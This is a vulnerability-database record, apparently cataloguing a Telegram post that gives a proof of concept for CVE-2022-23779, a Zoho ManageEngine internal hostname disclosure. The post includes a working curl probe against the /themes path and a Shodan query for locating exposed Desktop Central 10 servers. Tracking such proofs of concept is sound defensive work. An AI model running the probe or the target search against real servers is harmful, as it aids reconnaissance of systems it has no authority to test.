{"uuid": "db389376-7b60-4f21-89c6-3bc3e36d1db7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-23779", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/952", "content": "CVE-2022-23779\n\u0412\u043e\u0442 \u0441\u0435\u0439\u0447\u0430\u0441 \u0441\u043c\u0435\u0448\u043d\u043e \u0431\u0443\u0434\u0435\u0442\nZoho Internal Hostname Disclosure Vulnerability\nStep 1: curl -ILk https://IP:port/themes\nStep 2: Read the HTTP redirect response and anaylze the Location HTTP response header.\n*\nBONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\ngithub\n#zoho  #funnyExploit", "creation_timestamp": "2022-09-06T17:34:37.000000Z"}